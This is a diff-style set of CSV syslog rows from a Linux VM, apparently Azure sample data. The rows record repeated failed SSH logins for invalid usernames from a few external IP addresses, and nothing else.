+18945,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 11:03:51,UbuntuDevEnv,2019-06-26 11:03:50,auth,UbuntuDevEnv,info,Invalid user nagios from 138.68.146.186 port 38776,92924,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,nagios,138.68.146.1,38776,,
+18946,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 11:03:51,UbuntuDevEnv,2019-06-26 11:03:50,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=138.68.146.186,92924,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,138.68.146.1,,0,
+18947,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 11:03:51,UbuntuDevEnv,2019-06-26 11:03:50,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,92924,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+18948,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 11:03:52,UbuntuDevEnv,2019-06-26 11:03:52,auth,UbuntuDevEnv,info,Failed password for invalid user nagios from 138.68.146.186 port 38776 ssh2,92924,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,nagios,138.68.146.1,38776,,
+18949,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 11:03:52,UbuntuDevEnv,2019-06-26 11:03:52,auth,UbuntuDevEnv,info,Disconnected from invalid user nagios 138.68.146.186 port 38776 [preauth],92924,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,nagios,138.68.146.1,38776,,
+18950,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 11:03:52,UbuntuDevEnv,2019-06-26 11:03:52,auth,UbuntuDevEnv,info,"Received disconnect from 138.68.146.186 port 38776:11: Normal Shutdown, Thank you for playing [preauth]",92924,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,138.68.146.1,38776,,
+18951,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 11:04:28,UbuntuDevEnv,2019-06-26 11:04:27,auth,UbuntuDevEnv,info,Invalid user admin from 106.13.142.247 port 56184,93052,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,admin,106.13.142.2,56184,,
+18952,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 11:04:28,UbuntuDevEnv,2019-06-26 11:04:27,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,93052,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+18953,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 11:04:28,UbuntuDevEnv,2019-06-26 11:04:27,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=106.13.142.247,93052,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,106.13.142.2,,0,
+18954,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 11:04:29,UbuntuDevEnv,2019-06-26 11:04:29,auth,UbuntuDevEnv,info,Failed password for invalid user admin from 106.13.142.247 port 56184 ssh2,93052,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,admin,106.13.142.2,56184,,
+18955,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 11:04:30,UbuntuDevEnv,2019-06-26 11:04:29,auth,UbuntuDevEnv,info,Disconnected from invalid user admin 106.13.142.247 port 56184 [preauth],93052,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,admin,106.13.142.2,56184,,
+18956,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 11:04:30,UbuntuDevEnv,2019-06-26 11:04:29,auth,UbuntuDevEnv,info,Received disconnect from 106.13.142.247 port 56184:11: Bye Bye [preauth],93052,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,106.13.142.2,56184,,
+18957,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 11:04:38,UbuntuDevEnv,2019-06-26 11:04:38,auth,UbuntuDevEnv,info,Invalid user wpyan from 47.44.115.81 port 37272,93083,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,wpyan,47.44.115.8,37272,,
+18958,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 11:04:38,UbuntuDevEnv,2019-06-26 11:04:38,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,93083,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+18959,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 11:04:38,UbuntuDevEnv,2019-06-26 11:04:38,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=47.44.115.81,93083,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,47.44.115.8,,0,
+18960,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 11:04:40,UbuntuDevEnv,2019-06-26 11:04:40,auth,UbuntuDevEnv,info,Failed password for invalid user wpyan from 47.44.115.81 port 37272 ssh2,93083,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,wpyan,47.44.115.8,37272,,
+18961,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 11:04:40,UbuntuDevEnv,2019-06-26 11:04:40,auth,UbuntuDevEnv,info,Disconnected from invalid user wpyan 47.44.115.81 port 37272 [preauth],93083,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,wpyan,47.44.115.8,37272,,
+18962,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 11:04:40,UbuntuDevEnv,2019-06-26 11:04:40,auth,UbuntuDevEnv,info,Received disconnect from 47.44.115.81 port 37272:11: Bye Bye [preauth],93083,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,47.44.115.8,37272,,
+18963,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 11:06:04,UbuntuDevEnv,2019-06-26 11:06:03,auth,UbuntuDevEnv,info,Invalid user iraf from 106.13.142.247 port 40208,93389,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,iraf,106.13.142.2,40208,,
+18964,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 11:06:04,UbuntuDevEnv,2019-06-26 11:06:03,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=106.13.142.247,93389,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,106.13.142.2,,0,
+18965,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 11:06:04,UbuntuDevEnv,2019-06-26 11:06:03,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,93389,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+18966,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 11:06:05,UbuntuDevEnv,2019-06-26 11:06:05,auth,UbuntuDevEnv,info,Failed password for invalid user iraf from 106.13.142.247 port 40208 ssh2,93389,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,iraf,106.13.142.2,40208,,
+18967,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 11:06:06,UbuntuDevEnv,2019-06-26 11:06:05,auth,UbuntuDevEnv,info,Received disconnect from 106.13.142.247 port 40208:11: Bye Bye [preauth],93389,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,106.13.142.2,40208,,
+18968,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 11:06:06,UbuntuDevEnv,2019-06-26 11:06:05,auth,UbuntuDevEnv,info,Disconnected from invalid user iraf 106.13.142.247 port 40208 [preauth],93389,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,iraf,106.13.142.2,40208,,
+18969,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 11:06:42,UbuntuDevEnv,2019-06-26 11:06:42,auth,UbuntuDevEnv,info,Invalid user postmaster from 47.44.115.81 port 54524,93526,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,postmaster,47.44.115.8,54524,,
+18970,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 11:06:42,UbuntuDevEnv,2019-06-26 11:06:42,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=47.44.115.81,93526,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,47.44.115.8,,0,
+18971,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 11:06:42,UbuntuDevEnv,2019-06-26 11:06:42,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,93526,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+18972,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 11:06:45,UbuntuDevEnv,2019-06-26 11:06:44,auth,UbuntuDevEnv,info,Failed password for invalid user postmaster from 47.44.115.81 port 54524 ssh2,93526,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,postmaster,47.44.115.8,54524,,
+18973,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 11:06:45,UbuntuDevEnv,2019-06-26 11:06:44,auth,UbuntuDevEnv,info,Disconnected from invalid user postmaster 47.44.115.81 port 54524 [preauth],93526,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,postmaster,47.44.115.8,54524,,
+18974,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 11:06:45,UbuntuDevEnv,2019-06-26 11:06:44,auth,UbuntuDevEnv,info,Received disconnect from 47.44.115.81 port 54524:11: Bye Bye [preauth],93526,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,47.44.115.8,54524,,
+18975,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 11:07:40,UbuntuDevEnv,2019-06-26 11:07:39,auth,UbuntuDevEnv,info,Invalid user dominic from 106.13.142.247 port 52470,93721,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,dominic,106.13.142.2,52470,,
+18976,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 11:07:40,UbuntuDevEnv,2019-06-26 11:07:39,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,93721,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+18977,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 11:07:40,UbuntuDevEnv,2019-06-26 11:07:39,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=106.13.142.247,93721,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,106.13.142.2,,0,
+18978,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 11:07:41,UbuntuDevEnv,2019-06-26 11:07:41,auth,UbuntuDevEnv,info,Failed password for invalid user dominic from 106.13.142.247 port 52470 ssh2,93721,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,dominic,106.13.142.2,52470,,
+18979,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 11:07:42,UbuntuDevEnv,2019-06-26 11:07:41,auth,UbuntuDevEnv,info,Received disconnect from 106.13.142.247 port 52470:11: Bye Bye [preauth],93721,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,106.13.142.2,52470,,
+18980,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 11:07:42,UbuntuDevEnv,2019-06-26 11:07:41,auth,UbuntuDevEnv,info,Disconnected from invalid user dominic 106.13.142.247 port 52470 [preauth],93721,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,dominic,106.13.142.2,52470,,
+18981,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 11:08:53,UbuntuDevEnv,2019-06-26 11:08:52,auth,UbuntuDevEnv,info,Invalid user soap from 47.44.115.81 port 43538,93987,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,soap,47.44.115.8,43538,,
+18982,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 11:08:53,UbuntuDevEnv,2019-06-26 11:08:52,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,93987,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+18983,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 11:08:53,UbuntuDevEnv,2019-06-26 11:08:52,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=47.44.115.81,93987,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,47.44.115.8,,0,
+18984,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 11:08:54,UbuntuDevEnv,2019-06-26 11:08:54,auth,UbuntuDevEnv,info,Failed password for invalid user soap from 47.44.115.81 port 43538 ssh2,93987,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,soap,47.44.115.8,43538,,
+18985,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 11:08:55,UbuntuDevEnv,2019-06-26 11:08:54,auth,UbuntuDevEnv,info,Disconnected from invalid user soap 47.44.115.81 port 43538 [preauth],93987,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,soap,47.44.115.8,43538,,
+18986,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 11:08:55,UbuntuDevEnv,2019-06-26 11:08:54,auth,UbuntuDevEnv,info,Received disconnect from 47.44.115.81 port 43538:11: Bye Bye [preauth],93987,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,47.44.115.8,43538,,
+18987,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 11:09:15,UbuntuDevEnv,2019-06-26 11:09:15,auth,UbuntuDevEnv,info,Invalid user upload from 106.13.142.247 port 36496,94067,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,upload,106.13.142.2,36496,,
+18988,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 11:09:15,UbuntuDevEnv,2019-06-26 11:09:15,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,94067,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+18989,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 11:09:15,UbuntuDevEnv,2019-06-26 11:09:15,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=106.13.142.247,94067,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,106.13.142.2,,0,
+18990,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 11:09:17,UbuntuDevEnv,2019-06-26 11:09:16,auth,UbuntuDevEnv,info,Failed password for invalid user upload from 106.13.142.247 port 36496 ssh2,94067,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,upload,106.13.142.2,36496,,
+18991,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 11:09:18,UbuntuDevEnv,2019-06-26 11:09:17,auth,UbuntuDevEnv,info,Disconnected from invalid user upload 106.13.142.247 port 36496 [preauth],94067,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,upload,106.13.142.2,36496,,
+18992,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 11:09:18,UbuntuDevEnv,2019-06-26 11:09:17,auth,UbuntuDevEnv,info,Received disconnect from 106.13.142.247 port 36496:11: Bye Bye [preauth],94067,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,106.13.142.2,36496,,
+18993,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 11:10:56,UbuntuDevEnv,2019-06-26 11:10:56,auth,UbuntuDevEnv,info,Invalid user comerce from 106.13.142.247 port 48746,94421,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,comerce,106.13.142.2,48746,,
+18994,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 11:10:56,UbuntuDevEnv,2019-06-26 11:10:56,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=106.13.142.247,94421,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,106.13.142.2,,0,
+18995,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 11:10:56,UbuntuDevEnv,2019-06-26 11:10:56,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,94421,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+18996,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 11:10:58,UbuntuDevEnv,2019-06-26 11:10:58,auth,UbuntuDevEnv,info,Failed password for invalid user comerce from 106.13.142.247 port 48746 ssh2,94421,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,comerce,106.13.142.2,48746,,
+18997,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 11:10:59,UbuntuDevEnv,2019-06-26 11:10:58,auth,UbuntuDevEnv,info,Disconnected from invalid user comerce 106.13.142.247 port 48746 [preauth],94421,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,comerce,106.13.142.2,48746,,
+18998,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 11:10:59,UbuntuDevEnv,2019-06-26 11:10:58,auth,UbuntuDevEnv,info,Received disconnect from 106.13.142.247 port 48746:11: Bye Bye [preauth],94421,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,106.13.142.2,48746,,
+18999,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 11:11:07,UbuntuDevEnv,2019-06-26 11:11:06,auth,UbuntuDevEnv,info,Invalid user bwanjiru from 47.44.115.81 port 60790,94459,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,bwanjiru,47.44.115.8,60790,,
+19000,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 11:11:07,UbuntuDevEnv,2019-06-26 11:11:06,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=47.44.115.81,94459,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,47.44.115.8,,0,
+19001,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 11:11:07,UbuntuDevEnv,2019-06-26 11:11:06,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,94459,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+19002,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 11:11:09,UbuntuDevEnv,2019-06-26 11:11:08,auth,UbuntuDevEnv,info,Failed password for invalid user bwanjiru from 47.44.115.81 port 60790 ssh2,94459,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,bwanjiru,47.44.115.8,60790,,
+19003,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 11:11:09,UbuntuDevEnv,2019-06-26 11:11:09,auth,UbuntuDevEnv,info,Disconnected from invalid user bwanjiru 47.44.115.81 port 60790 [preauth],94459,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,bwanjiru,47.44.115.8,60790,,
+19004,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 11:11:09,UbuntuDevEnv,2019-06-26 11:11:09,auth,UbuntuDevEnv,info,Received disconnect from 47.44.115.81 port 60790:11: Bye Bye [preauth],94459,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,47.44.115.8,60790,,
